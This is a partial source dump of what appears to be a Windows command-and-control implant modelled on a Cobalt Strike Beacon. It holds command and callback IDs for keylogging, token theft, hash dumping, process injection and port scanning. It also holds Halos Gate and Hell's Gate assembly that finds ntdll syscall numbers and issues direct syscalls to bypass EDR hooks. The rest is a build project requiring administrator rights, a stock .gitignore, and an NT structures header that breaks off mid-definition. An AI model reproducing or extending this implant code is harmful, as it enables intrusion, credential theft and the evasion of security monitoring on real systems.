BeaconRevertToken(); 79 | void BeaconErrorD(); 
80 | void BeaconSpawn(char* Taskdata, int Task_size); 81 | void BeaconReflectiveDLLInject(char* payload, int payloadsize); 82 | int BeaconDataCopyToBuffer1(datap* parser, char* buffer, int buffer_size); 83 | 84 | 85 | 86 | BOOL is_admin(); 87 | int BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFOA* sInfo, PROCESS_INFORMATION* pInfo); 88 | void BeaconcloseAllHandle(PROCESS_INFORMATION* pi); 89 | BOOL __cdecl toWideChar(char* lpMultiByteStr, wchar_t* lpWideCharStr, unsigned int max); 90 | char* BeaconFormatOriginalPtr(formatp* format); 91 | int CheckMemoryRWX(LPVOID lpAddress, SIZE_T dwSize); 92 | char* BeaconDataPtr3(datap* parser, int* outsize); 93 | #define CALLBACK_OUTPUT 0 94 | #define CALLBACK_KEYSTROKES 1 95 | #define CALLBACK_FILE 2 96 | #define CALLBACK_SCREENSHOT 3 97 | #define CALLBACK_CLOSE 4 98 | #define CALLBACK_READ 5 99 | #define CALLBACK_CONNECT 6 100 | #define CALLBACK_PING 7 101 | #define CALLBACK_FILE_WRITE 8 102 | #define CALLBACK_FILE_CLOSE 9 103 | #define CALLBACK_PIPE_OPEN 10 104 | #define CALLBACK_PIPE_CLOSE 11 105 | #define CALLBACK_PIPE_READ 12 106 | #define CALLBACK_POST_ERROR 13 107 | #define CALLBACK_PIPE_PING 14 108 | #define CALLBACK_TOKEN_STOLEN 15 109 | #define CALLBACK_TOKEN_GETUID 16 110 | #define CALLBACK_PROCESS_LIST 17 111 | #define CALLBACK_POST_REPLAY_ERROR 18 112 | #define CALLBACK_PWD 19 113 | #define CALLBACK_JOBS 20 114 | #define CALLBACK_HASHDUMP 21 115 | #define CALLBACK_PENDING 22 116 | #define CALLBACK_ACCEPT 23 117 | #define CALLBACK_NETVIEW 24 118 | #define CALLBACK_PORTSCAN 25 119 | #define CALLBACK_DEAD 26 120 | #define CALLBACK_SSH_STATUS 27 121 | #define CALLBACK_CHUNK_ALLOCATE 28 122 | #define CALLBACK_CHUNK_SEND 29 123 | #define CALLBACK_OUTPUT_OEM 30 124 | #define CALLBACK_ERROR 31 125 | #define CALLBACK_OUTPUT_UTF8 32 126 | #define CMD_TYPE_SLEEP 4 127 | #define CMD_TYPE_PAUSE 47 128 | #define CMD_TYPE_SHELL 78 129 | #define CMD_TYPE_UPLOAD_START 10 130 | #define CMD_TYPE_UPLOAD_LOOP 67 131 
| #define CMD_TYPE_DOWNLOAD 11 132 | #define CMD_TYPE_Jobs 41 133 | #define CMD_TYPE_Jobskill 42 134 | #define CMD_TYPE_EXIT 3 135 | #define CMD_TYPE_CD 5 136 | #define CMD_TYPE_PWD 39 137 | #define CMD_TYPE_FILE_BROWSE 53 138 | #define CMD_TYPE_SPAWN_X64 44 139 | #define CMD_TYPE_SPAWN_X86 1 140 | #define CMD_TYPE_EXECUTE 12 141 | #define CMD_TYPE_GETUID 27 142 | #define CMD_TYPE_GET_PRIVS 77 143 | #define CMD_TYPE_STEAL_TOKEN 31 144 | #define CMD_TYPE_PS 32 145 | #define CMD_TYPE_KILL 33 146 | #define CMD_TYPE_DRIVES 55 147 | #define CMD_TYPE_RUNAS 38 148 | #define CMD_TYPE_MKDIR 54 149 | #define CMD_TYPE_RM 56 150 | #define CMD_TYPE_CP 73 151 | #define CMD_TYPE_MV 74 152 | #define CMD_TYPE_REV2SELF 28 153 | #define CMD_TYPE_MAKE_TOKEN 49 154 | #define CMD_TYPE_PIPE 40 155 | #define CMD_TYPE_PORTSCAN_X86 89 156 | #define CMD_TYPE_PORTSCAN_X64 90 157 | #define CMD_TYPE_KEYLOGGER 101 158 | #define CMD_TYPE_EXECUTE_ASSEMBLY_X64 88 159 | #define CMD_TYPE_EXECUTE_ASSEMBLY_X86 87 160 | #define CMD_TYPE_EXECUTE_ASSEMBLY_TOKEN_X64 71 161 | #define CMD_TYPE_EXECUTE_ASSEMBLY_TOKEN_X86 70 162 | #define CMD_TYPE_IMPORT_POWERSHELL 37 163 | #define CMD_TYPE_POWERSHELL_PORT 79 164 | #define CMD_TYPE_INJECT_X64 43 165 | #define CMD_TYPE_INJECT_X86 9 166 | #define CMD_TYPE_BOF 100 167 | #define CMD_TYPE_RUNU 76 168 | #define CMD_TYPE_ARGUE_QUERY 85 169 | #define CMD_TYPE_ARGUE_REMOVE 84 170 | #define CMD_TYPE_ARGUE_ADD 83 171 | #define CMD_TYPE_DumpHHH 103 -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 
118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. 
Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger 
configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /Beacon/bcookesHalosGate.asm: -------------------------------------------------------------------------------- 1 | ; Author: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/ 2 | ; Credits / References: Pavel Yosifovich (@zodiacon),Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique) 3 | 4 | .code 5 | 6 | getntdll PROC 7 | xor rdi, rdi ; RDI = 0x0 8 | mul rdi ; RAX&RDX =0x0 9 | mov rbx, gs:[rax+60h] ; RBX = Address_of_PEB 10 | mov rbx, [rbx+18h] ; RBX = Address_of_LDR 11 | mov rbx, [rbx+20h] ; 12 | mov rbx, [rbx] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll 13 | mov rbx, [rbx+20h] ; RBX = &ntdll.dll ( Base Address of ntdll.dll) 14 | mov rax, rbx ; RBX & RAX = &ntdll.dll 15 | ret ; return to caller 16 | getntdll ENDP 17 | 18 | ; Get ExportTable Address of supplied module DLL 19 | getExportTable PROC 20 | mov rbx, rcx ; RBX = Supplied Module Address 21 | mov r8, rcx ; R8 = Supplied Module Address 22 | mov ebx, [rbx+3Ch] ; RBX = Offset NewEXEHeader 23 | add rbx, r8 ; RBX = &ntdll.dll + Offset NewEXEHeader = &NewEXEHeader 24 | xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add 25 | add cx, 88ffh 26 | shr rcx, 8h ; RCX = 0x88ff --> 0x88 27 | mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable 28 | add 
rdx, r8 ; RDX = &ntdll.dll + RVA ExportTable = &ExportTable 29 | mov rax, rdx ; RAX = &module.ExportTable 30 | ret ; return to caller 31 | getExportTable ENDP 32 | 33 | ; Get &module.ExportTable.AddressTable from &module.ExportTable 34 | getExAddressTable PROC 35 | mov r8, rdx ; R8 = &module.dll 36 | mov rdx, rcx ; RDX = &module.ExportTable 37 | xor r10, r10 38 | mov r10d, [rdx+1Ch] ; RDI = RVA AddressTable 39 | add r10, r8 ; R10 = &AddressTable 40 | mov rax, r10 ; RAX = &module.ExportTable.AddressTable 41 | ret ; return to caller 42 | getExAddressTable ENDP 43 | 44 | ; Get &module.NamePointerTable from &module.ExportTable 45 | getExNamePointerTable PROC 46 | mov r8, rdx ; R8 = &module.dll 47 | mov rdx, rcx ; RDX = &module.ExportTable 48 | xor r11, r11 49 | mov r11d, [rdx+20h] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable 50 | add r11, r8 ; R11 = &NamePointerTable (Memory Address of module Export NamePointerTable) 51 | mov rax, r11 ; RAX = &module.ExportTable.NamePointerTable 52 | ret ; return to caller 53 | getExNamePointerTable ENDP 54 | 55 | ; Get &OrdinalTable from ntdll.dll ExportTable 56 | getExOrdinalTable PROC 57 | mov r8, rdx ; R8 = &module.dll 58 | mov rdx, rcx ; RDX = &module.ExportTable 59 | xor r12, r12 60 | mov r12d, [rdx+24h] ; R12 = RVA OrdinalTable 61 | add r12, r8 ; R12 = &OrdinalTable 62 | mov rax, r12 ; RAX = &module.ExportTable.OrdinalTable 63 | ret ; return to caller 64 | getExOrdinalTable ENDP 65 | 66 | ; Get the address of the API from the module ExportTable 67 | ; IN: &Module.ExportTable.NamePointerTable + &Module 68 | getApiAddr PROC 69 | mov r10, r9 ; R10 = &module.ExportTable.AddressTable 70 | mov r11, [rsp+28h] ; R11 = &module.ExportTable.NamePointerTable 71 | mov r12, [rsp+30h] ; R12 = &module.ExportTable.OrdinalTable 72 | xor rax, rax ; Setup Counter for resolving the API Address after finding the name string 73 | push rcx ; push the string length counter to stack 74 | jmp short getApiAddrLoop 75 | 
getApiAddr ENDP 76 | 77 | getApiAddrLoop PROC 78 | mov rcx, [rsp] ; reset the string length counter from the stack 79 | xor rdi, rdi ; Clear RDI for setting up string name retrieval 80 | mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] 81 | add rdi, r8 ; RDI = &NameString = RVA NameString + &module.dll 82 | mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string) 83 | repe cmpsb ; Compare strings at RDI & RSI 84 | je getApiAddrFin ; If match then we found the API string. Now we need to find the Address of the API 85 | inc rax 86 | jmp short getApiAddrLoop 87 | getApiAddrLoop ENDP 88 | 89 | ; Find the address of GetProcAddress by using the last value of the Counter 90 | getApiAddrFin PROC 91 | pop rcx ; remove string length counter from top of stack 92 | mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of module. 93 | mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber] 94 | add rax, r8 ; RAX = module. = RVA module. + module.dll BaseAddress 95 | ret ; return to API caller 96 | getApiAddrFin ENDP 97 | 98 | ; Find the syscall number for the NTDLL API with provided API address 99 | ; RCX = NTDLL.API Address 100 | findSyscallNumber PROC 101 | xor rsi, rsi 102 | xor rdi, rdi 103 | mov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX 104 | mov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub (mov r10,rcx;mov eax,) 105 | cmp rsi, rdi 106 | jne error ; if the bytes dont match then its prob hooked. Exit gracefully 107 | xor rax,rax ; clear RAX as it will hold the syscall 108 | mov ax, [rcx+4] ; The systemcall number 109 | ret ; return to caller 110 | findSyscallNumber ENDP 111 | 112 | ; RCX = &NTDLL.API
| RDX = 32bytes * Up Increment 113 | halosGateUp PROC 114 | xor rsi, rsi 115 | xor rdi, rdi 116 | mov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX 117 | xor rax, rax 118 | mov al, 20h ; 32 * Increment = Syscall Up 119 | mul dx ; RAX = RAX * RDX = 32 * Syscall Up 120 | add rcx, rax ; RCX = NTDLL.API +- Syscall Stub 121 | mov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Up by HalosGate (mov r10, rcx; mov eax, ) 122 | cmp rsi, rdi 123 | jne error ; if the bytes dont match then its prob hooked. Exit gracefully 124 | xor rax,rax ; clear RAX as it will hold the syscall 125 | mov ax, [rcx+4] ; The systemcall number for the API close to the target 126 | ret ; return to caller 127 | halosGateUp ENDP 128 | 129 | ; RCX = &NTDLL.API | RDX = 32bytes * Down Increment 130 | halosGateDown PROC 131 | xor rsi, rsi 132 | xor rdi, rdi 133 | mov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX 134 | xor rax, rax 135 | mov al, 20h ; 32 * Increment = Syscall Down 136 | mul dx ; RAX = RAX * RDX = 32 * Syscall Down 137 | sub rcx, rax ; RCX = NTDLL.API - Syscall Stub 138 | mov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Down by HalosGate (mov r10, rcx; mov eax, ) 139 | cmp rsi, rdi 140 | jne error ; if the bytes dont match then its prob hooked.
Exit gracefully 141 | xor rax,rax ; clear RAX as it will hold the syscall 142 | mov ax, [rcx+4] ; The systemcall number for the API close to the target 143 | ret ; return to caller 144 | halosGateDown ENDP 145 | 146 | error PROC 147 | xor rax, rax ; return 0 for error 148 | ret ; return to caller 149 | error ENDP 150 | 151 | HellsGate PROC 152 | xor r11, r11 153 | mov r11d, ecx 154 | ret 155 | HellsGate ENDP 156 | 157 | HellDescent PROC 158 | xor rax, rax 159 | mov r10, rcx 160 | mov eax, r11d 161 | syscall 162 | ret 163 | HellDescent ENDP 164 | 165 | compExplorer PROC 166 | xor rsi, rsi 167 | cmp rsi, rcx 168 | je error ; This is a null entry, skip this one 169 | mov rsi, 6c007000780065h ; unicode "expl" 170 | mov rdx, [rcx] ; move the first 4 characters of the string into RCX register 171 | cmp rsi, rdx 172 | jne error ; if the bytes dont its match not "expl", try the next one 173 | mov rsi, 7200650072006fh ; 6f 00 72 00 65 00 72 00 o.r.e.r. 174 | mov rdx, [rcx+8h] ; move the next 4 characters of the string into RCX register "orer" 175 | cmp rsi, rdx 176 | jne error ; if the bytes dont match its not "explorer", try the next one 177 | mov rsi, 6500780065002eh ; 2e 00 65 00 78 00 65 00 ..e.x.e. 
178 | mov rdx, [rcx+10h] ; move the next 4 characters of the string into RCX register ".exe" 179 | cmp rsi, rdx 180 | jne error ; if the bytes dont match its not "explorer.exe", try the next one 181 | mov rax, 1h ; found "explorer.exe" return true 182 | ret 183 | compExplorer ENDP 184 | 185 | end 186 | -------------------------------------------------------------------------------- /Beacon/Beacon.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {191a6f50-ae83-44d1-8446-9afb9a077a97} 25 | Beacon 26 | 10.0 27 | x86-windows-static 28 | x64-windows-static 29 | 30 | 31 | 32 | Application 33 | true 34 | v143 35 | Unicode 36 | 37 | 38 | Application 39 | false 40 | v143 41 | true 42 | Unicode 43 | 44 | 45 | Application 46 | true 47 | v143 48 | Unicode 49 | 50 | 51 | Application 52 | false 53 | v143 54 | true 55 | Unicode 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | false 78 | C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\curl_x64-windows\include\curl;C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\openssl_x64-windows\include\openssl;$(IncludePath) 79 | C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\curl_x64-windows\lib;C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\openssl_x64-windows\lib;$(LibraryPath) 80 | 81 | 82 | 83 | Level3 84 | true 85 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 86 | true 87 | 88 | 89 | Console 90 | true 91 | 92 | 93 | 94 | 95 | Level3 96 | true 97 | true 98 | true 99 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 100 | true 101 | 102 | 103 | Console 104 | true 105 | true 106 | true 107 | 108 | 109 | 110 | 111 | Level3 112 | true 113 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 114 | true 115 
| 4996 116 | MultiThreadedDebug 117 | true 118 | 119 | 120 | Console 121 | true 122 | dbghelp.lib;Crypt32.lib;%(AdditionalDependencies) 123 | RequireAdministrator 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | MultiThreadedDebug 135 | true 136 | Default 137 | Disabled 138 | false 139 | 140 | 141 | Console 142 | true 143 | true 144 | false 145 | RequireAdministrator 146 | dbghelp.lib;zlib.lib;Crypt32.lib;%(AdditionalDependencies) 147 | 148 | 149 | 150 | 151 | false 152 | MultiThreadedDebug 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | false 183 | 184 | 185 | 186 | 187 | 188 | 189 | -------------------------------------------------------------------------------- /Beacon/ntdef.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "GuangMing.h" 4 | 5 | // most of this header code took from --> https://github.com/hfiref0x/NtCall64/blob/master/Source/NtCall64/ntos.h 6 | // credits to @hfiref0x 7 | 8 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004 9 | #define STATUS_INSUFFICIENT_RESOURCES 0xC0000009A 10 | #define STATUS_NOT_FOUND 0xC0000225 11 | #define SystemHandleInformation 16 12 | 13 | #ifndef RtlOffsetToPointer 14 | #define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) )) 15 | #endif 16 | 17 | 18 | #ifndef ALIGN_UP_TYPE 19 | #define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1)) 20 | #endif 21 | 22 | #ifndef ALIGN_UP 23 | #define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type)) 24 | #endif 25 | 26 | #ifndef RTL_CONSTANT_STRING 27 | char _RTL_CONSTANT_STRING_type_check(const void* s); 28 | #define _RTL_CONSTANT_STRING_remove_const_macro(s) (s) 29 | #define RTL_CONSTANT_STRING(s) \ 30 | { \ 
31 | sizeof( s ) - sizeof( (s)[0] ), \ 32 | sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \ 33 | _RTL_CONSTANT_STRING_remove_const_macro(s) \ 34 | } 35 | #endif 36 | 37 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 38 | #define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\ 39 | RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR)) 40 | 41 | #define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\ 42 | RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \ 43 | ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR)) 44 | 45 | //typedef struct _CLIENT_ID { 46 | // HANDLE UniqueProcess; 47 | // HANDLE UniqueThread; 48 | //} CLIENT_ID; 49 | 50 | typedef struct _GDI_TEB_BATCH 51 | { 52 | ULONG Offset; 53 | HANDLE HDC; 54 | ULONG Buffer[310]; 55 | } GDI_TEB_BATCH; 56 | 57 | //typedef struct _UNICODE_STRING { 58 | // USHORT Length; 59 | // USHORT MaximumLength; 60 | // PWSTR Buffer; 61 | //} UNICODE_STRING, * PUNICODE_STRING; 62 | 63 | typedef struct _TEB 64 | { 65 | NT_TIB NtTib; 66 | PVOID EnvironmentPointer; 67 | CLIENT_ID ClientId; 68 | PVOID ActiveRpcHandle; 69 | PVOID ThreadLocalStoragePointer; 70 | PVOID ProcessEnvironmentBlock; 71 | ULONG LastErrorValue; 72 | ULONG CountOfOwnedCriticalSections; 73 | PVOID CsrClientThread; 74 | PVOID Win32ThreadInfo; 75 | ULONG User32Reserved[26]; 76 | ULONG UserReserved[5]; 77 | PVOID WOW32Reserved; 78 | LCID CurrentLocale; 79 | ULONG FpSoftwareStatusRegister; 80 | PVOID SystemReserved1[54]; 81 | LONG ExceptionCode; 82 | UCHAR Padding0[4]; 83 | PVOID ActivationContextStackPointer; 84 | UCHAR SpareBytes[24]; 85 | ULONG TxFsContext; 86 | GDI_TEB_BATCH GdiTebBatch; 87 | CLIENT_ID RealClientId; 88 | PVOID GdiCachedProcessHandle; 89 | ULONG GdiClientPID; 90 | ULONG GdiClientTID; 91 | PVOID GdiThreadLocalInfo; 92 | SIZE_T Win32ClientInfo[62]; 93 | PVOID glDispatchTable[233]; 94 | SIZE_T glReserved1[29]; 95 | PVOID glReserved2; 96 | 
PVOID glSectionInfo; 97 | PVOID glSection; 98 | PVOID glTable; 99 | PVOID glCurrentRC; 100 | PVOID glContext; 101 | ULONG LastStatusValue; 102 | UCHAR Padding2[4]; 103 | UNICODE_STRING StaticUnicodeString; 104 | WCHAR StaticUnicodeBuffer[261]; 105 | UCHAR Padding3[6]; 106 | PVOID DeallocationStack; 107 | PVOID TlsSlots[64]; 108 | LIST_ENTRY TlsLinks; 109 | PVOID Vdm; 110 | PVOID ReservedForNtRpc; 111 | PVOID DbgSsReserved[2]; 112 | ULONG HardErrorMode; 113 | UCHAR Padding4[4]; 114 | PVOID Instrumentation[11]; 115 | GUID ActivityId; 116 | PVOID SubProcessTag; 117 | PVOID EtwLocalData; 118 | PVOID EtwTraceData; 119 | PVOID WinSockData; 120 | ULONG GdiBatchCount; 121 | union 122 | { 123 | PROCESSOR_NUMBER CurrentIdealProcessor; 124 | ULONG32 IdealProcessorValue; 125 | struct 126 | { 127 | UCHAR ReservedPad0; 128 | UCHAR ReservedPad1; 129 | UCHAR ReservedPad2; 130 | UCHAR IdealProcessor; 131 | }; 132 | }; 133 | ULONG GuaranteedStackBytes; 134 | UCHAR Padding5[4]; 135 | 